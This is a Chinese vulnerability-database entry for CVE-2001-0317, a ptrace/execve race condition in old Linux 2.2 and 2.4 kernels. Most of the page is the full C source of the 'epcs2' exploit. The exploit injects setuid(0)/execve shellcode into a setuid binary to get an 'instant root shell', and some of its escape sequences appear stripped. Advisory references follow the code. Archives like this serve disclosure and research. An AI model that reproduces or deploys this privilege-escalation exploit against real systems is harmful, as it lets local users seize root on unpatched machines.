Linux kernel ptrace竞态条件漏洞
漏洞ID | 1106269 | 漏洞类型 | 未知 |
发布时间 | 2001-03-27 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-2001-0317 |
CNNVD-ID | CNNVD-200105-038 |
漏洞平台 | Linux | CVSS评分 | 3.7 |
|漏洞来源
|漏洞详情
Linuxkernel2.4和2.2版本中ptrace存在竞态条件漏洞。本地用户通过使用ptrace追踪和修改运行的修改用户标识符程序提升特权。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/2529/info
The Linux kernel is the core of all distributions of the Linux Operating System. It was originally written by Linus Torvalds, and is maintained by a community of developers.
A problem in the Linux Kernel could make it possible for a local user to gain elevated privileges. A problem with the checking of process tracing on programs attempting to execute other programs that are setuid or setgid. It is possible to trace a process after it has entered a setuid or setgid execution state.
This makes it possible for a local user to change parts of the process as they function, and potentially gain elevated privileges.
*/
/*
* epcs2 (improved by lst [[email protected]])
* ~~~~~~~
* exploit for execve/ptrace race condition in Linux kernel up to 2.2.18
*
* originally by:
* (c) 2001 Wojciech Purczynski / cliph / <[email protected]>
*
* improved by:
* lst [[email protected]]
*
* This sploit does _not_ use brute force. It does not need that.
* It does only one attemt to sploit the race condition in execve.
* Parent process waits for a context-switch that occur after
* child task sleep in execve.
*
* It should work even on openwall-patched kernels (I haven't tested it).
*
* Compile it:
* cc epcs.c -o epcs
* Usage:
* ./epcs [victim]
*
* It gives instant root shell with any of a suid binaries.
*
* If it does not work, try use some methods to ensure that execve
* would sleep while loading binary file into memory,
*
* i.e.: cat /usr/lib/* >/dev/null 2>&1
*
* Tested on RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4
* This exploit does not work on 2.4.x because kernel won't set suid
* privileges if user ptraces a binary.
* But it is still exploitable on these kernels.
*
* Thanks to Bulba (he made me to take a look at this bug ;) )
* Greetings to SigSegv team.
*
* -- d00t
* improved by lst [[email protected]]
* props to kevin for most of the work
*
* now works on stack non-exec systems with some neat trickery for the automated
* method, ie. no need to find the bss segment via objdump
*
* particularly it now rewrites the code instruction sets in the
* dynamic linker _start segment and continues execution from there.
*
* an aside, due to the fact that the code self-modified, it wouldnt work
* quite correctly on a stack non-exec system without playing directly with
* the bss segment (ie no regs.eip = regs.esp change). this is much more
* automated. however, do note that the previous version did not trigger stack
* non-exec warnings due to how it was operating. note that the regs.eip = regs.esp
* method will break on stack non-exec systems.
*
* as always.. enjoy.
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <signal.h>
#include <linux/user.h>
#include <sys/wait.h>
#include <limits.h>
#include <errno.h>
#include <stdlib.h>
#define CS_SIGNAL SIGUSR1
#define VICTIM "/usr/bin/passwd"
#define SHELL "/bin/sh"
/*
* modified simple shell code with some trickery (hand tweaks)
*/
char shellcode[]=
"x90x90x90x90x90x90x90x90x90"
"x31xc0x31xdbxb0x17xcdx80" /* setuid(0) */
"x31xc0xb0x2excdx80"
"x31xc0x50xebx17x8bx1cx24" /* execve(SHELL) */
"x90x90x90x89xe1x8dx54x24" /* lets be tricky */
"x04xb0x0bxcdx80x31xc0x89"
"xc3x40xcdx80xe8xe4xffxff"
"xff" SHELL "x00x00x00" ; /* pad me */
volatile int cs_detector=0;
void cs_sig_handler(int sig)
{
cs_detector=1;
}
void do_victim(char * filename)
{
while (!cs_detector) ;
kill(getppid(), CS_SIGNAL);
execl(filename, filename, NULL);
perror("execl");
exit(-1);
}
int check_execve(pid_t victim, char * filename)
{
char path[PATH_MAX+1];
char link[PATH_MAX+1];
int res;
snprintf(path, sizeof(path), "/proc/%i/exe", (int)victim);
if (readlink(path, link, sizeof(link)-1)<0) {
perror("readlink");
return -1;
}
link[sizeof(link)-1]=' ';
res=!strcmp(link, filename);
if (res) fprintf(stderr, "child slept outside of execven");
return res;
}
int main(int argc, char * argv[])
{
char * filename=VICTIM;
pid_t victim;
int error, i;
struct user_regs_struct regs;
/* take our command args if you wanna play with other progs */
if (argc>1) filename=argv[1];
signal(CS_SIGNAL, cs_sig_handler);
victim=fork();
if (victim<0) {
perror("fork: victim");
exit(-1);
}
if (victim==0) do_victim(filename);
kill(victim, CS_SIGNAL);
while (!cs_detector) ;
if (ptrace(PTRACE_ATTACH, victim)) {
perror("ptrace: PTRACE_ATTACH");
goto exit;
}
if (check_execve(victim, filename))
goto exit;
(void)waitpid(victim, NULL, WUNTRACED);
if (ptrace(PTRACE_CONT, victim, 0, 0)) {
perror("ptrace: PTRACE_CONT");
goto exit;
}
(void)waitpid(victim, NULL, WUNTRACED);
if (ptrace(PTRACE_GETREGS, victim, 0, ®s)) {
perror("ptrace: PTRACE_GETREGS");
goto exit;
}
/* make sure that last null is in there */
for (i=0; i<=strlen(shellcode); i+=4) {
if (ptrace(PTRACE_POKETEXT, victim, regs.eip+i,
*(int*)(shellcode+i))) {
perror("ptrace: PTRACE_POKETEXT");
goto exit;
}
}
if (ptrace(PTRACE_SETREGS, victim, 0, ®s)) {
perror("ptrace: PTRACE_SETREGS");
goto exit;
}
fprintf(stderr, "bug exploited successfully.nenjoy!n");
if (ptrace(PTRACE_DETACH, victim, 0, 0)) {
perror("ptrace: PTRACE_DETACH");
goto exit;
}
(void)waitpid(victim, NULL, 0);
return 0;
exit:
fprintf(stderr, "d0h! error!n");
kill(victim, SIGKILL);
return -1;
}
|参考资料
来源:CALDERA
名称:CSSA-2001-009
链接:http://www.caldera.com/support/security/advisories/CSSA-2001-009.0.txt
来源:BUGTRAQ
名称:20010213TrustixSecurityAdvisory-proftpd,kernel
链接:http://archives.neohapsis.com/archives/bugtraq/2001-02/0267.html
来源:XF
名称:linux-ptrace-modify-process(6080)
链接:http://xforce.iss.net/xforce/xfdb/6080
来源:REDHAT
名称:RHSA-2001:013
链接:http://www.redhat.com/support/errata/RHSA-2001-013.html
相关推荐: WhitSoft Development SlimFTPd目录遍历漏洞
WhitSoft Development SlimFTPd目录遍历漏洞 漏洞ID 1205439 漏洞类型 路径遍历 发布时间 2001-08-21 更新时间 2001-08-21 CVE编号 CVE-2001-1131 CNNVD-ID CNNVD-2001…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666